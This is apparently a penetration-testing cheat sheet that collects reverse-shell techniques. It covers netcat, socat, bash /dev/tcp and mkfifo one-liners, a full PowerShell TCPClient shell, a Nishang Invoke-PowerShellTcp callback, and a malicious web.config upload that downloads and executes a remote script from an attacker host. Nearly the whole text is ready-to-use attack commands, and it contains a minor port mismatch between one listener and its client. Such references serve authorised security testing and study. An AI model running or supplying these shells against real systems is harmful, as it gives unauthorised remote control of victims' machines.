Reverse Shell
In a reverse shell, the target machine connects to the attacker computer.
Netcat
On the attacker computer, first start a listener as follows:
attacker> $ nc -nvlp 443
On the victim shell, connect to the attacker IP device:
victim> $ nc -nv <attacker.IP> 4444 -e /bin/bash
Socat
On the attacker machine, run socat :
attacker> $ socat -d -d TCP4-LISTEN:4444 STDOUT
Then, on the victim shell, connect to the attacker IP device :
victim> $ socat TCP4:<attacker.IP>:4444 EXEC:/bin/bash
Bash
As previously, start a listener on the attacker computer.
attacker> $ nc -nvlp 443
Then, run the following bash instructions on the victim machine.
victim> $ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <attacker IP> 443 >/tmp/f
From a simple web shell, the following command can be useful:
bash -c 'bash -i >& /dev/tcp/<attacker IP>/443 0>&1'
PowerShell
On the attacker machine, open a netcat listener:
attacker> $ nc -lnvp 443
Next, send a PowerShell reverse shell from the victim's computer:
C:\\Users\\victim> $client = New-Object System.Net.Sockets.TCPClient('<attacker.IP>',443);
C:\\Users\\victim> $stream = $client.GetStream();
C:\\Users\\victim> [byte[]]$bytes = 0..65535|%{0};
C:\\Users\\victim> while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
C:\\Users\\victim> {
C:\\Users\\victim> $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
C:\\Users\\victim> $sendback = (iex $data 2>&1 | Out-String );
C:\\Users\\victim> $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
$stream.Write($sendbyte,0,$sendbyte.Length);
$stream.Flush();
}
$client.Close();
The above command can also be run from a command prompt as follows:
C:\\Users\\victim> powershell -c "$client = New-Object System.Net.Sockets.TCPClient('<attacker.IP>',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
Nishang
First, grab a copy of Nishang’s Invoke-PowerShellTcp.ps1. Then, add the below line at the end of the script to automatically invoke a callback:
Invoke-PowerShellTcp -Reverse -IPAddress <AttackerIp> -Port 443
Upload this file to the victim computer and execute it. Do not forget to previously start a listener on the attacker server.
Web.config
This method can be very destructive where an application already uses a web.config file that is going to be replaced with ours which might not have all the required settings such as the database connection string or some valid assembly references. It is recommended to not use this technique on live websites when an application might have used a web.config file which is going to be replaced. IIS applications that are inside other applications or virtual directories might not use a web.config file and are generally safer candidates than website’s root directory.
<?xml version="1.0" encoding="UTF-8"?> <configuration> <system.webServer> <handlers accessPolicy="Read, Script, Write"> <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" /> </handlers> <security> <requestFiltering> <fileExtensions> <remove fileExtension=".config" /> </fileExtensions> <hiddenSegments> <remove segment="web.config" /> </hiddenSegments> </requestFiltering> </security> </system.webServer> </configuration> <%@ Language=VBScript %> <% call Server.CreateObject("WSCRIPT.SHELL").Run("cmd.exe /c powershell.exe -c iex(new-object net.webclient).downloadstring('http://<AttackerIP>/Invoke-PowerShellTcp.ps1')") %>
Note that the above content aims to download a Nishang's powershell script from the attacker server and instantly execute it on the victim device. So, it is necessary to previously start a web server and a listener corresponding to the one specified on the Nishang's script (please refer to the previous section to configure it). These both operations can respectively be done as follows:
attacker> $ python -m http.server 80
attacker> $ nc -nvlp 443
Last updated